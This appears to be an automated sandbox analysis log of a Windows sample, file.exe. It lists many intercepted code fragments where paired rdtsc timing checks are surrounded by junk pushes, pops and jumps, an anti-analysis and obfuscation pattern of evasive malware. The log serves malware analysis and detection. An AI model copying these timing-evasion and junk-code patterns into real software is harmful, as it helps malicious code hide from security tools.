                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A53B second address: 87A53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A53F second address: 87A543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A543 second address: 87A55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E9917DE26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F5E9917DE26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A55B second address: 87A55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D1A6 second address: 91D1C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE37h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D50E second address: 91D531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E987E4129h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D685 second address: 91D69A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D69A second address: 91D69F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D69F second address: 91D6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5E9917DE26h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jns 00007F5E9917DE2Ch 0x00000014 jng 00007F5E9917DE2Eh 0x0000001a js 00007F5E9917DE26h 0x00000020 push edx 0x00000021 pop edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F5E9917DE32h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D6DD second address: 91D6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D6E1 second address: 91D6EB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5E9917DE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9211B8 second address: 9211BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9211BE second address: 9211C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925B67 second address: 925B71 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E987E411Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925E2C second address: 925E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E9917DE2Bh 0x00000009 jp 00007F5E9917DE26h 0x0000000f jc 00007F5E9917DE26h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F5E9917DE38h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925FB0 second address: 925FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6F8C second address: 8C6F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6F90 second address: 8C6F9E instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E987E4116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6F9E second address: 8C701E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, ebx 0x0000000f mov ebx, dword ptr [ebp+124880E0h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F5E9917DE28h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f xor cl, FFFFFFD2h 0x00000032 add eax, ebx 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F5E9917DE28h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e or dword ptr [ebp+122D2ADAh], edi 0x00000054 clc 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jp 00007F5E9917DE28h 0x0000005e push edi 0x0000005f pop edi 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C701E second address: 8C7024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7024 second address: 8C706D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E9917DE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F5E9917DE28h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push 00000004h 0x0000002b mov edx, dword ptr [ebp+122D2A8Ah] 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 js 00007F5E9917DE2Ch 0x0000003a jnl 00007F5E9917DE26h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926BF3 second address: 926C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E987E4122h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926C09 second address: 926C0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926C0F second address: 926C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926C15 second address: 926C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926C19 second address: 926C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926C1D second address: 926C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926C29 second address: 926C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E987E4120h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E387 second address: 92E38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E38B second address: 92E3AE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jnl 00007F5E987E4122h 0x0000000e jp 00007F5E987E4116h 0x00000014 jnc 00007F5E987E4116h 0x0000001a push ecx 0x0000001b jnp 00007F5E987E4116h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E92F second address: 92E947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E9917DE34h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937732 second address: 937736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937A02 second address: 937A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE39h 0x00000007 jmp 00007F5E9917DE2Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937A2E second address: 937A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937BA0 second address: 937BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937BA4 second address: 937BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937E76 second address: 937E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F5E9917DE2Eh 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937E95 second address: 937EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F5E987E4116h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937EA3 second address: 937EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937EA7 second address: 937EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937EAB second address: 937EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940186 second address: 94018C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94018C second address: 940190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940190 second address: 9401C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5E987E411Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F5E987E4127h 0x00000015 jnp 00007F5E987E4116h 0x0000001b jmp 00007F5E987E411Bh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9401C0 second address: 9401CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5E9917DE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9401CA second address: 9401CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E2A8 second address: 93E2C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E9917DE26h 0x0000000a jnl 00007F5E9917DE32h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E2C4 second address: 93E2EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E411Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F5E987E4121h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E2EE second address: 93E2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E70D second address: 93E712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E712 second address: 93E735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F5E9917DE26h 0x00000009 jmp 00007F5E9917DE30h 0x0000000e jng 00007F5E9917DE26h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93EA03 second address: 93EA07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93EA07 second address: 93EA0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93EA0B second address: 93EA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93EC9D second address: 93ECB8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F5E9917DE2Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93ECB8 second address: 93ECBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F143 second address: 93F149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F149 second address: 93F14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F14D second address: 93F151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F847 second address: 93F84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FFF1 second address: 93FFF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FFF7 second address: 94001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E987E4124h 0x00000009 popad 0x0000000a jnc 00007F5E987E411Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94001C second address: 940028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 js 00007F5E9917DE26h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9476B4 second address: 9476BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9476BA second address: 9476C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9476C0 second address: 9476D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5E987E4116h 0x00000009 jl 00007F5E987E4116h 0x0000000f jc 00007F5E987E4116h 0x00000015 popad 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9476D9 second address: 9476FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5E9917DE26h 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5E9917DE2Fh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94702D second address: 94703E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E411Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94703E second address: 947069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F5E9917DE37h 0x00000010 pop edx 0x00000011 jo 00007F5E9917DE32h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947069 second address: 94706F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9471DC second address: 9471E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94737B second address: 9473A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E987E411Fh 0x0000000b pushad 0x0000000c jmp 00007F5E987E4124h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9473A7 second address: 9473AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9535BB second address: 9535BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9535BF second address: 9535C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9535C5 second address: 9535CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9535CB second address: 9535CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9578DB second address: 95790A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E987E4125h 0x0000000d jmp 00007F5E987E4122h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95790A second address: 957910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957910 second address: 957920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5E987E411Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95743C second address: 957440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957440 second address: 957446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957446 second address: 957460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5E9917DE38h 0x0000000c jmp 00007F5E9917DE2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962040 second address: 962050 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E987E4116h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962050 second address: 96205C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96205C second address: 962060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962060 second address: 96206E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96206E second address: 962094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5E987E411Ch 0x0000000c jmp 00007F5E987E4121h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972597 second address: 9725C3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E9917DE2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F5E9917DE26h 0x00000010 jmp 00007F5E9917DE36h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9710C5 second address: 9710CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5E987E411Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97136A second address: 971370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971370 second address: 971376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971376 second address: 9713A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F5E9917DE38h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9713A5 second address: 9713AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9713AB second address: 9713D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5E9917DE34h 0x0000000b jmp 00007F5E9917DE2Dh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9713D9 second address: 9713DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9713DD second address: 9713F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE36h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9716BE second address: 9716C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97227E second address: 972294 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E9917DE26h 0x00000008 jbe 00007F5E9917DE26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972294 second address: 972298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
